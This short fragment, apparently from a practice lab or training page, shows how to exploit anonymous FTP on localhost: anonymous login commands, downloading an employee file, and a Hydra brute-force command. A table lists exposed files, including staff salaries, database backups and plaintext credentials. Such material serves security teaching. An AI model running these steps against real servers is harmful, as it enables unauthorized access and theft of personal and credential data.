Anonymous login enabled. No password required.
# Connect with anonymous login ftp 127.0.0.1 # Username: anonymous # Password: (press Enter — blank) # List files ftp> ls -la # Download a file ftp> get employee_list.csv # Use Hydra for brute force (if anonymous fails) hydra -l anonymous -p "" ftp://127.0.0.1
Files available via anonymous FTP:
| Filename | Size | Contents |
|---|---|---|
| 📄 employee_list.csv | 12KB | Contains all employee names, emails, and salaries |
| 📄 backup_2024.tar.gz | 2.3GB | Full system backup — contains database dumps |
| 📄 config_old.txt | 4KB | Old server config with plaintext credentials |
| 📄 README.txt | 1KB | Anonymous FTP enabled for file sharing. No auth required. |